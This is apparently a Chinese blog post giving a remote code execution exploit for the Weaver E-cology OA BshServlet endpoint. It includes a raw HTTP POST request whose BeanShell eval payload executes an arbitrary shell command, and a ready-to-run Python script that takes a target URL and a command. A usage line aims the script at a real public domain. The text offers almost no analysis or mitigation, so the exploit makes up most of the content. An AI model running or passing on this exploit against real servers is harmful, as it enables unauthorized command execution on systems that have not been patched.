泛微E-cology OA 远程代码执行漏洞
2024-09-22 00:19:07
分析文章:https://dwz.cn/bYtnsKwa
http://127.0.0.1/weaver/bsh.servlet.BshServlet
若存在如上页面,则用下面数据包进行测试。
POST / weaver / bsh.servlet.BshServlet HTTP / 1.1 Host: 127.0 . 0.1 : 8080 Content - Length: 151 Cache - Control: max - age = 0 Origin: http: / / 127.0 . 0.1 : 8080 Upgrade - Insecure - Requests: 1 Content - Type : application / x - www - form - urlencoded User - Agent: Mozilla / 5.0 (Windows NT 10.0 ; Win64; x64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 76.0 . 3809.132 Safari / 537.36 Accept: text / html,application / xhtml + xml,application / xml;q = 0.9 ,image / webp,image / apng, * / * ;q = 0.8 ,application / signed - exchange;v = b3 Referer: http: / / 127.0 . 0.1 : 8080 Accept - Encoding: gzip, deflate Accept - Language: zh - CN,zh;q = 0.9 ,en;q = 0.8 Cookie: JSESSIONID = abc17Hyv4HXw_6_hyXo1w; testBanCookie = test Connection: close bsh.script = eval % 00 ( "ex" % 2b "ec(bsh.httpServletRequest.getParameter(\"command\"))" );&bsh.servlet.captureOutErr = true&bsh.servlet.output = raw&command = whoami |
EXP:
useage:python rce.py http://www.baidu.com whoami
#!/usr/bin/env python
import requests
import sys headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Content-Type': 'application/x-www-form-urlencoded'
} def exploit(url,cmd):
target=url+'/weaver/bsh.servlet.BshServlet'
payload='bsh.script=eval%00("ex"%2b"ec(\\"cmd+/c+{}\\")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw'.format(cmd)
res=requests.post(url=target,data=payload,headers=headers,timeout=10)
res.encoding=res.apparent_encoding
print(res.text) if __name__ == '__main__':
url=sys.argv[1]
cmd=sys.argv[2]
exploit(url,cmd)
最新文章
- nginx server中的server_name配置的域名在客户机上无法访问
- android Camera 如何判断当前使用的摄像头是前置还是后置
- 29.调整数组顺序使奇数位于偶数前面[ReOrderArray]
- 机器学习中的数学(1)-回归(regression)、梯度下降(gradient descent)
- 为PHP开发者准备的12个调试工具
- Nginx干货(二)配置详解
- [Linux] Configure iSCSI on Linux5 (both target and initiator)
- SQL SEVER 时间格式转换
- Kafka技术内幕 读书笔记之(三) 生产者——消费者:高级API和低级API——基础知识
- tarjan求lca :并查集+dfs
- lua语言三目运算符
- git第八节---git 撤销和回滚
- Onsen UI快速入门 --Onsen UI
- C# 利用反射调用类下的方法
- 解决DoubanFM第三方客户端UI线程与工作线程交互问题
- 【python】实例-判断用户输入数字的类型
- TCP包服务器接受程序
- M-PalindromeP-DP
- 一对一关联关系基于主键映射的异常 IdentifierGenerationException
- java md5 函数